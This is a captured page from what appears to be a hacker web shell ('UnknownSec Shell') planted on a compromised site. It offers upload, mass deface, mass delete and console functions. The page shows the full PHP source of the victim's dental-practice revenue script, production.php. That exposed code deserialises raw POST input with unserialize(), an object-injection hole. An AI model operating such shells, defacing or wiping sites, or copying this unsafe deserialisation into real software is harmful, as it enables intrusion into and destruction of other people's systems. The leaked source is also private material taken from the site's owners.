shell bypass 403
UnknownSec Shell
:
/
home
/
delvin
/
dev.delv-in.com
/ [
drwxr-x---
]
upload
mass deface
mass delete
console
info server
name :
production.php
<?php /* Delvin Dev Production */ include('ini.php'); $Template = new Template; $Revenue = new Revenue; if ((isset($_SESSION['LID']) && $_SESSION['LID'] <= 0) || !isset($_SESSION['LID'])){ $Template->redirect("index.php"); } if (!isset($_POST['submitBut'])){ $_POST['submitBut'] = ''; } if (!isset($_POST['action'])){ $_POST['action'] = ''; } date_default_timezone_set($_SESSION['timeZone']); $result = ''; if (isset($_POST['f_start']) && isset($_POST['f_end']) && strtotime($_POST['f_start']) > strtotime($_POST['f_end'])){ $result = 'ERROR: Please select a logical date range.'; } // UPDATE THE DATABASE $error = FALSE; // echo __line__.": producerID=" . $_POST['producerID'] . ", date=" . $_POST['date'] ."<br>"; if ($_POST['submitBut'] == 'Save'){ $ID_arr = explode('|', $_POST['producerID']); $producerID = intval($ID_arr[0]); $dentistID = intval($ID_arr[1]); $PMS_ID = $ID_arr[2]; // echo __line__.": <pre>"; print_r($ID_arr); echo "</pre>"; if ($_POST['date'] == ''){ $error = TRUE; $Template->set_alert("ERROR: The form is missing some required information. -" . __line__ , "error"); } else if ($producerID == '' || $dentistID == ''){ $error = TRUE; $Template->set_alert("ERROR: The producer has not been linked to their producer ID in DELVIN. Please contact support.", "error"); } else { // write to database $deleted = ''; if ($_POST['undelete'] == 'no'){ $deleted = 'Y'; } else if ($_POST['undelete'] == 'yes'){ $deleted = ""; } // echo __line__.": " . $_POST['undelete'] . ", " . $deleted . "<br>"; date_default_timezone_set($_SESSION['timeZone']); // check for duplicate if ($Revenue->conflict_chk($_POST['revID'], $producerID, $dentistID, strtotime($_POST['date']))){ $error = TRUE; $Template->set_alert("ERROR: An entry for the same producer, date & allocation exists. Duplicate entries are not permitted. Please edit the existing entry.", "error"); } if ($error == FALSE){ $Users = new Users; $uRow = $Users->search($_SESSION['PID'], $producerID, '', '', '', '', '', $_POST['startTS'], $_POST['endTS'], '', '',''); $jobAreaID = $uRow['jobAreaID']; // echo __line__.": amtColl=" . $_POST['amtColl'] .", amtCollAdjust=" . $_POST['amtCollAdjust'] . ", netColl=" . $_POST['netColl'] . "<br>"; if ($Revenue->add_mod($_POST['revID'], $producerID, $dentistID, $PMS_ID, strtotime($_POST['date']), $_POST['amtProd'], $_POST['amtLab'], $_POST['amtProdAdjust'], $_POST['amtColl'], $_POST['amtCollAdjust'], $_POST['amtSales'], $_POST['netProd'], $_POST['netColl'], htmlspecialchars($_POST['note']), $jobAreaID, $deleted)){ $Template->set_alert('Production data saved.', 'success'); } else { $Template->set_alert('ERROR: Production data was NOT saved.', 'error'); } } } } else if ($_POST['submitBut'] == 'Confirm Delete'){ if ($Revenue->delete($_POST['revID'])){ $Template->set_alert('Production log item #' . $_POST['revID'] . " was deleted." , "success"); } else { $Template->set_alert("ERROR: Production log item #" . $_POST['revID'] . " couldn't be deleted.", "error"); } } else if ($_POST['action'] == 'lock'){ $Revenue->set_lock($_POST['revID'], $_POST['locked']); } else if ($_POST['submitBut'] == 'Undelete'){ if ($Revenue->undelete($_POST['revID'])){ $Template->set_alert('Production log #' . $_POST['revID'] . " was undeleted and will now appear in the the list of valid log entries", "success"); } else { $Template->set_alert("ERROR: Production log #" . $_POST['revID'] . " was not deleted.", "error"); } } if ($_POST['submitBut'] == 'Upload File' && $_FILES['csv']['name'] == '' ){ $Template->set_alert('ERROR: Some required form data is missing', "error"); } // IMPORT DATA FROM PMS $import_success = true; if ($_POST['submitBut'] == 'Import'){ $import_data_arr = unserialize($_POST['data2_arr']); // echo __line__.": <pre>"; print_r($import_data_arr); echo"</pre>"; // $producer_arr = unserialize($_POST['producer_arr']); $result_count = 0; // echo __line__.": <pre>"; print_r($data_arr); print_r($action_arr); print_r($post_ids_arr); echo"</pre>"; foreach ($import_data_arr as $key => $row){ $dateTS = strtotime($row['date'] . " 12:00 PM"); if ($row['amtProdAdjust'] > 0){ if ($row['amtProd'] <= 0){ $import_data_arr[$key]['amtProd'] = $row['netProd'] + $row['amtProdAdjust']; } else if ($row['netProd'] <= 0){ $import_data_arr[$key]['netProd'] = $row['amtProd'] - $row['amtProdAdjust']; } } else { if ($row['amtProd'] <= 0 && $row['netProd'] > 0){ $import_data_arr[$key]['amtProd'] = $row['netProd']; } else if ($row['netProd'] <= 0 && $row['amtProd'] > 0){ $import_data_arr[$key]['netProd'] = $row['amtProd']; } } if ($row['amtCollAdjust'] > 0){ if ($row['amtColl'] <= 0){ $import_data_arr[$key]['amtColl'] = $row['netColl'] + $row['amtCollAdjust']; } else if ($row['netColl'] <= 0){ $import_data_arr[$key]['netColl'] = $row['amtColl'] - $row['amtCollAdjust']; } } else { if ($row['amtColl'] <= 0 && $row['netColl'] > 0){ $import_data_arr[$key]['amtColl'] = $row['netColl']; } else if ($row['netColl'] <= 0 && $row['amtColl'] > 0){ $import_data_arr[$key]['netColl'] = $row['amtColl']; } } // === import data if ($row['amtProd'] != 0 || $row['amtLab'] != 0 || $row['amtProdAdjust'] != 0 || $row['amtColl'] != 0 || $row['amtCollAdjust'] != 0 || $row['netProd'] != 0 || $row['netColl'] != 0){ if ($Revenue->import($row['revID'], $row['producerID'], $row['dentistID'], $row['PMS_ID'], $dateTS, $row['amtProd'], $row['amtLab'], $row['amtProdAdjust'], $row['amtColl'], $row['amtCollAdjust'], $row['netProd'], $row['netColl'], $row['jobAreaID'])){ $result_count++; } } else { unset($import_data_arr[$key]); } } if (count($import_data_arr) == $result_count){ $Template->set_alert('All data was imported successfully', 'success'); $error = false; if (file_exists('temp/'.$_SESSION['PID']."/".$_POST['filename'])){ // unlink('temp/'.$_SESSION['PID']."/".$_POST['filename']); } } else { $num_bad = count($import_data_arr) - $result_count; $result = 'ERROR: '. $num_bad . " of the " . count($import_data_arr) . " datasets FAILED to import."; $import_success = false; } // ECHO __line__.": <pre>"; print_r($import_data_arr); print_r($p_exists_arr); print_r($c_exists_arr); print_r($allocate_arr); echo "</pre>"; } include('includes/private_header.php'); // DISPLAY ALERTS echo $Template->get_alerts(); // SET VIEW if ($_SESSION['LID']){ if ($_POST['submitBut'] == 'Add Manually' || $_POST['submitBut'] == 'Edit' || ($error == TRUE && $_POST['submitBut'] == 'Save') || ($_POST['submitBut'] == '' && $_POST['action'] != '' && $_POST['action'] != 'lock')){ if ($_SESSION['PMS'] == 'Dentrix'){ $Template->load('views/v_production_edit_Dentrix.php', 'Production'); } else { $Template->load('views/v_production_edit.php', 'Production'); } } else if ($_POST['submitBut'] == 'Import Data' || ($_POST['submitBut'] == 'Import' && $error === true) || substr($_POST['submitBut'], 0, 6) == 'Upload' || $_POST['submitBut'] == 'Continue' ){ $Template->load("views/v_production_import.php", 'Production'); } else if ($_POST['submitBut'] == 'Delete'){ $Template->load('views/v_production_del.php', 'Production'); } else if ($_POST['submitBut'] == 'Get Reports'){ $Template->load('views/v_reportProduction.php'); } else { if (isset($_POST['action']) && isset($_POST['prodID'])){ if ($_POST['prodID'] > 0 && $_POST['action'] == 'lock'){ $Production->set_lock($_POST['prodID']); } } // display list of staff production $Template->load('views/v_production.php', 'Production'); } } else { include('views/v_sess_exp.php'); } // echo __line__."<pre>"; print_r($_SESSION); echo "</pre>"; include('includes/private_footer.php'); ?>
© 2026 UnknownSec